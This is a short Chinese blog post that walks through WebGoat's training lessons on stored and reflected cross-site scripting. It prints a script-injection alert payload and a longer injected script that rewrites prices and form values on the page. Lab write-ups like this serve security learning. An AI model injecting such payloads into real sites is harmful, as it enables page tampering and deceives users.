WebGoat——XSS Attacks(part 2)

1、存储型

WebGoat——XSS Attacks(part 2)_第1张图片

脚本:><script>alert('just for fun')</script>


------------------------------------------------------------------------------------------------------------------------------------------------------------

2、反射型

WebGoat——XSS Attacks(part 2)_第2张图片

题意:通过反射型XSS,修改页面数据来达到攻击的目的。

大哭有点难度,参考答案做的。。。)

代码如下

'><script>
alert('This kinda is called reflected XSS or First-Order XSS!');
for(i=0;i<=document.getElementsByTagName("td").length-1;i++)
{
	if(document.getElementsByTagName("td")[i].innerHTML.indexOf('$')>0)
	{
		document.getElementsByTagName("td")[i].innerHTML = '$0';<!--找到$符号,将$符号后面的值都替换为0-->
	}
};
for(i=0;i<=document.getElementsByTagName("input").length-1;i++)
{
	if(document.getElementsByTagName("input")[i].type=='text')
	{
		document.getElementsByTagName("input")[i].value='10000';<!--找到文本域(text),将文本域里的值都替换为10000-->
	}
};
</script>

效果:

WebGoat——XSS Attacks(part 2)_第3张图片

WebGoat——XSS Attacks(part 2)_第4张图片

第一个篡改,修改$后值为0,不知道为什么没有生效。。。原因还不晓得。。。。


------------------------------------------------------------------------------------------------------------------------------------------------------------





你可能感兴趣的:(脚本,存储,input,fun)